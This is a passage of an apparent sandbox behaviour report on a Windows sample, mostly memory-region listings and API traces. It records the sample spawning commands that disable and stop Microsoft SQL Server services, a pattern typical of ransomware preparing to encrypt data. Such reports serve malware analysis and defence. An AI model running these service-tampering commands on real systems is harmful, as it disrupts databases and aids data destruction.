"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5941 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5942 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5943 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5944 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5945 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5946 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5947 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5948 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5949 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5950 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5951 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 378 os_tid = 0xb08 Thread: id = 379 os_tid = 0xb00 Thread: id = 380 os_tid = 0x224 Process: id = "97" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x41283000" os_pid = "0xca8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "95" os_parent_pid = "0xdb0" cmd_line = "sc config MSSQL$SQLEXPRESS start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5965 start_va = 0x360000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 5966 start_va = 0x380000 end_va = 0x381fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 5967 start_va = 0x390000 end_va = 0x3a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 5968 start_va = 0x3b0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 5969 start_va = 0x3f0000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 5970 start_va = 0x430000 end_va = 0x433fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 5971 start_va = 0x440000 end_va = 0x440fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 5972 start_va = 0x450000 end_va = 0x451fff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 5973 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 5974 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 5975 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5976 start_va = 0x7f680000 end_va = 0x7f6a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f680000" filename = "" Region: id = 5977 start_va = 0x7f6a9000 end_va = 0x7f6a9fff entry_point = 0x0 region_type = private name = "private_0x000000007f6a9000" filename = "" Region: id = 5978 start_va = 0x7f6ac000 end_va = 0x7f6aefff entry_point = 0x0 region_type = private name = "private_0x000000007f6ac000" filename = "" Region: id = 5979 start_va = 0x7f6af000 end_va = 0x7f6affff entry_point = 0x0 region_type = private name = "private_0x000000007f6af000" filename = "" Region: id = 5980 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5981 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5982 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 5983 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5984 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 5985 start_va = 0x600000 end_va = 0x60ffff entry_point = 0x0 region_type = private name = "private_0x0000000000600000" filename = "" Region: id = 5986 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5987 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5988 start_va = 0x7d0000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x00000000007d0000" filename = "" Region: id = 5989 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5990 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 5991 start_va = 0x370000 end_va = 0x373fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 5992 start_va = 0x460000 end_va = 0x51dfff entry_point = 0x460000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5993 start_va = 0x520000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 5994 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 5995 start_va = 0x6f0000 end_va = 0x6fffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 5996 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5997 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5998 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5999 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6000 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6001 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6002 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6003 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6004 start_va = 0x7f580000 end_va = 0x7f67ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f580000" filename = "" Region: id = 6005 start_va = 0x7f6a6000 end_va = 0x7f6a8fff entry_point = 0x0 region_type = private name = "private_0x000000007f6a6000" filename = "" Region: id = 6006 start_va = 0x610000 end_va = 0x6eefff entry_point = 0x610000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 6007 start_va = 0x5a0000 end_va = 0x5b1fff entry_point = 0x5a0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 382 os_tid = 0xd10 [0127.679] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0127.679] __set_app_type (_Type=0x1) [0127.679] __p__fmode () returned 0x77ac4d6c [0127.679] __p__commode () returned 0x77ac5b1c [0127.679] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0127.679] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0127.679] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.682] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.682] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0127.682] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0127.682] _wcsicmp (_String1="config", _String2="query") returned -14 [0127.682] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0127.682] _wcsicmp (_String1="config", _String2="start") returned -16 [0127.682] _wcsicmp (_String1="config", _String2="pause") returned -13 [0127.682] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0127.682] _wcsicmp (_String1="config", _String2="control") returned -14 [0127.682] _wcsicmp (_String1="config", _String2="continue") returned -14 [0127.682] _wcsicmp (_String1="config", _String2="stop") returned -16 [0127.682] _wcsicmp (_String1="config", _String2="config") returned 0 [0127.682] ResolveDelayLoadedAPI () returned 0x77262c10 [0127.682] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x7d8548 [0127.684] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0127.684] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0127.684] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0127.684] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0127.685] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0127.685] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0127.685] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0127.685] OpenServiceW (hSCManager=0x7d8548, lpServiceName="MSSQL$SQLEXPRESS", dwDesiredAccess=0x3) returned 0x0 [0127.685] GetLastError () returned 0x424 [0127.685] _ultow (in: _Dest=0x424, _Radix=4390208 | out: _Dest=0x424) returned="1060" [0127.685] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0127.686] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x42fd1c, nSize=0x2, Arguments=0x42fd34 | out: lpBuffer="裘}ﵜB蔔è") returned 0x62 [0127.686] GetFileType (hFile=0x3c) returned 0x2 [0127.686] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x42fd00 | out: lpMode=0x42fd00) returned 1 [0127.687] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x7d88d8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x42fd10, lpReserved=0x0 | out: lpBuffer=0x7d88d8*, lpNumberOfCharsWritten=0x42fd10*=0x62) returned 1 [0127.687] LocalFree (hMem=0x7d88d8) returned 0x0 [0127.687] LocalFree (hMem=0x0) returned 0x0 [0127.687] CloseServiceHandle (hSCObject=0x7d8548) returned 1 [0127.687] LocalFree (hMem=0x0) returned 0x0 [0127.687] exit (_Code=1060) Thread: id = 383 os_tid = 0xcb0 Process: id = "98" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x52a1a000" os_pid = "0xd18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSSQLSERVER" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6008 start_va = 0x270000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6009 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6010 start_va = 0x2a0000 end_va = 0x2b3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 6011 start_va = 0x2c0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 6012 start_va = 0x300000 end_va = 0x303fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 6013 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 6014 start_va = 0x320000 end_va = 0x321fff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 6015 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 6016 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 6017 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 6018 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6019 start_va = 0x7f2b0000 end_va = 0x7f2d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f2b0000" filename = "" Region: id = 6020 start_va = 0x7f2d9000 end_va = 0x7f2d9fff entry_point = 0x0 region_type = private name = "private_0x000000007f2d9000" filename = "" Region: id = 6021 start_va = 0x7f2dc000 end_va = 0x7f2defff entry_point = 0x0 region_type = private name = "private_0x000000007f2dc000" filename = "" Region: id = 6022 start_va = 0x7f2df000 end_va = 0x7f2dffff entry_point = 0x0 region_type = private name = "private_0x000000007f2df000" filename = "" Region: id = 6023 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6024 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6025 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 6026 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6027 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 6028 start_va = 0x4700000 end_va = 0x470ffff entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 6029 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6030 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6031 start_va = 0x4830000 end_va = 0x492ffff entry_point = 0x0 region_type = private name = "private_0x0000000004830000" filename = "" Region: id = 6032 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6073 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 6074 start_va = 0x330000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6075 start_va = 0x4510000 end_va = 0x45cdfff entry_point = 0x4510000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6076 start_va = 0x45d0000 end_va = 0x46cffff entry_point = 0x0 region_type = private name = "private_0x00000000045d0000" filename = "" Region: id = 6077 start_va = 0x4a90000 end_va = 0x4a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000004a90000" filename = "" Region: id = 6078 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6079 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6080 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6081 start_va = 0x7f1b0000 end_va = 0x7f2affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f1b0000" filename = "" Region: id = 6082 start_va = 0x7f2d6000 end_va = 0x7f2d8fff entry_point = 0x0 region_type = private name = "private_0x000000007f2d6000" filename = "" Region: id = 6083 start_va = 0x280000 end_va = 0x283fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 6084 start_va = 0x290000 end_va = 0x293fff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6085 start_va = 0x4aa0000 end_va = 0x4dd6fff entry_point = 0x4aa0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 384 os_tid = 0xd34 [0127.840] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0127.840] __set_app_type (_Type=0x1) [0127.840] __p__fmode () returned 0x77ac4d6c [0127.840] __p__commode () returned 0x77ac5b1c [0127.840] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0127.840] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0127.840] GetCurrentThreadId () returned 0xd34 [0127.840] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd34) returned 0x84 [0127.840] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0127.840] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0127.840] SetThreadUILanguage (LangId=0x0) returned 0x409 [0127.842] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0127.843] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x450fdc8 | out: phkResult=0x450fdc8*=0x0) returned 0x2 [0127.843] VirtualQuery (in: lpAddress=0x450fdcf, lpBuffer=0x450fd80, dwLength=0x1c | out: lpBuffer=0x450fd80*(BaseAddress=0x450f000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.843] VirtualQuery (in: lpAddress=0x4410000, lpBuffer=0x450fd80, dwLength=0x1c | out: lpBuffer=0x450fd80*(BaseAddress=0x4410000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0127.843] VirtualQuery (in: lpAddress=0x4411000, lpBuffer=0x450fd80, dwLength=0x1c | out: lpBuffer=0x450fd80*(BaseAddress=0x4411000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0127.843] VirtualQuery (in: lpAddress=0x4413000, lpBuffer=0x450fd80, dwLength=0x1c | out: lpBuffer=0x450fd80*(BaseAddress=0x4413000, AllocationBase=0x4410000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0127.843] VirtualQuery (in: lpAddress=0x4510000, lpBuffer=0x450fd80, dwLength=0x1c | out: lpBuffer=0x450fd80*(BaseAddress=0x4510000, AllocationBase=0x4510000, AllocationProtect=0x2, RegionSize=0xbe000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0127.843] GetConsoleOutputCP () returned 0x1b5 [0127.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0127.843] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0127.843] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.843] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0127.843] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.843] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0127.844] _get_osfhandle (_FileHandle=1) returned 0x3c [0127.844] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0127.844] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.844] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0127.844] _get_osfhandle (_FileHandle=0) returned 0x38 [0127.844] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0127.844] GetEnvironmentStringsW () returned 0x4837d60* [0127.844] FreeEnvironmentStringsA (penv="A") returned 1 [0127.844] GetEnvironmentStringsW () returned 0x4837d60* [0127.844] FreeEnvironmentStringsA (penv="A") returned 1 [0127.844] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450ed2c | out: phkResult=0x450ed2c*=0x94) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x0, lpData=0x450ed38*=0xd8, lpcbData=0x450ed34*=0x1000) returned 0x2 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x1, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x0, lpData=0x450ed38*=0x1, lpcbData=0x450ed34*=0x1000) returned 0x2 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x0, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x40, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x4, lpData=0x450ed38*=0x40, lpcbData=0x450ed34*=0x4) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x450ed30, lpData=0x450ed38, lpcbData=0x450ed34*=0x1000 | out: lpType=0x450ed30*=0x0, lpData=0x450ed38*=0x40, lpcbData=0x450ed34*=0x1000) returned 0x2 [0127.845] RegCloseKey (hKey=0x94) returned 0x0 [0127.845] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x450ed2c | out: phkResult=0x450ed2c*=0x94) returned 0x0 [0127.845] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x450ed30, 